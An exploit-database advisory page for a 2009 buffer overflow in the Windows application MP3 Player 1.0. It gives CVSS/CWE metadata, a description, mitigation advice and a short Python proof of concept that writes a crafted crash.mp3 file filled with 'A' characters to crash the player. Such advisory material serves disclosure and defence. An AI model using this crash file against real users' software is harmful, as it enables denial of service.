header-logo
Suggest Exploit
vendor:
MP3 Player
by:
l3D
7,5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: MP3 Player
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:brothersoft:mp3_player
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

MP3 player 1.0 Local Crash

A buffer overflow vulnerability exists in MP3 player 1.0 due to improper bounds checking of user-supplied input. An attacker can exploit this vulnerability by supplying a specially crafted MP3 file with a large number of 'A' characters, which can cause the application to crash.

Mitigation:

Ensure that user-supplied input is properly validated and sanitized before being used.
Source

Exploit-DB raw data:

#!/usr/bin/env python
#MP3 player 1.0 Local Crash
#Author: l3D
#Software Link: http://files.brothersoft.com/mp3_audio/players/td-mp3.exe
#Site: http://xraysecurity.blogspot.com
#IRC: irc://irc.nix.co.il
#Email: pupipup33@gmail.com

bad=open('crash.mp3', 'w')
bad.write('A'*0x1000)
bad.close()

Navigation

Suggest Exploit

Services By CQR